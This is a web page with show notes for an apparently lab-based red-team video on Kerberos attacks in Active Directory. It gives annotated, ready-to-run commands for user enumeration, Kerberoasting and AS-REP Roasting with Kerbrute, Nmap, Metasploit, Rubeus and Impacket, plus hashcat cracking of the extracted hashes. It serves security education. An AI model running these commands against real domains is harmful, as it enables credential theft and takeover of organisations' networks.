Active Directory
Windows
Kerberos
Red Team
Kerberos Attacks Explained: User Enumeration, Kerberoasting and AS-REP Roasting
// published · 2022-08-02
overview
Kerberos is the default authentication protocol in Active Directory environments — and a goldmine for attackers. This video covers the full attack chain: starting from user enumeration without credentials, through Kerberoasting to extract and crack service account hashes, to AS-REP Roasting against accounts with pre-authentication disabled. Each technique is demonstrated with multiple tools — from local execution on a compromised host to remote attacks via Impacket.
timestamps
- 00:00Intro
- 00:26Theory — how Kerberos authentication works
- 02:26User enumeration — Kerbrute, Nmap, Metasploit
- 06:48Kerberoasting — Rubeus and Impacket
- 15:08AS-REP Roasting — Rubeus and Impacket
- 20:00Outro
commands used
// user enumeration
kerbrute — enumerate valid domain users
# Kerbrute sends AS-REQ packets and reads the error codes:
# KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) = user doesn't exist
# KDC_ERR_PREAUTH_REQUIRED = user exists (pre-auth needed)
# download: https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
~/tools/kerbrute/kerbrute userenum \
--dc CONTROLLER.local \
-d CONTROLLER.local \
User.txt
nmap — enumerate users via krb5 nse script
# uses the same AS-REQ technique as Kerbrute
# useful when you only have nmap available on the target
nmap -p 88 --script=krb5-enum-users \
--script-args krb5-enum-users.realm='CONTROLLER.local',userdb=User.txt \
CONTROLLER.local
metasploit — kerberos_enumusers module
# bonus: this module also captures AS-REP hashes for accounts
# with pre-auth disabled — touching on AS-REP Roasting
msfconsole -q
use auxiliary/gather/kerberos_enumusers
set DOMAIN CONTROLLER.local
set RHOSTS CONTROLLER.local
set USER_FILE /home/m0rn1ngstr/thm/kerberos/User.txt
run
// kerberoasting
sharphound — collect bloodhound data
# transfer SharpHound to target machine
scp SharpHound.exe Administrator@CONTROLLER.local:C:/Users/Administrator/Downloads
# run on target — collects all AD objects, ACLs, sessions, and SPNs
cd C:\Users\Administrator\Downloads
.\SharpHound.exe -c All
# transfer the zip back to attacker machine for BloodHound
scp Administrator@Controller.local:C:/Users/Administrator/Downloads/20220802043744_BloodHound.zip .
rubeus — kerberoast all accounts (local)
# /nowrap — prevents base64 ticket from wrapping across lines (important for hashcat)
# /simple — outputs only the ticket hash, easier to copy and save
Rubeus.exe kerberoast /nowrap
Rubeus.exe kerberoast /nowrap /simple
rubeus — target a specific high-value account
# use BloodHound to identify high-privilege kerberoastable accounts first
# requesting a single ticket is stealthier than roasting all accounts
Rubeus.exe kerberoast /user:sqlservice /nowrap /simple
impacket — kerberoast remotely
# request tickets for all kerberoastable users
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request
# save all tickets directly to file
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request -outputfile k2_1.txt
# target a specific user
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request-user sqlservice
# target a specific user and save to file
impacket-GetUserSPNs controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request-user sqlservice -outputfile k2_2.txt
hashcat — crack kerberoast tickets
# -m 13100 = Kerberos 5 TGS-REP (RC4) hash type
# -a 0 = straight/dictionary attack
hashcat -m 13100 -a 0 k2_l.txt Pass.txt
// as-rep roasting
rubeus — as-rep roast all vulnerable users (local)
# targets accounts with "Do not require Kerberos preauthentication" enabled
# DC returns an encrypted TGT without verifying identity — crackable offline
Rubeus.exe asreproast /nowrap
# target a specific user identified via BloodHound
Rubeus.exe asreproast /nowrap /user:user3
impacket — as-rep roast remotely
# request tickets for all AS-REP-roastable users
impacket-GetNPUsers controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -request
# target a specific user — use their name as credentials, skip password at prompt
impacket-GetNPUsers controller.local/User3 \
-dc-ip 10.10.82.144 -request
# authenticated + target multiple users from a file
impacket-GetNPUsers controller.local/Administrator:'P@$$W0rd' \
-dc-ip 10.10.82.144 -usersfile userfile.txt
hashcat — crack as-rep roast hashes
# -m 18200 = Kerberos 5 AS-REP hash type (different from Kerberoasting)
# -a 0 = straight/dictionary attack
hashcat -m 18200 -a 0 hash2.txt Pass.txt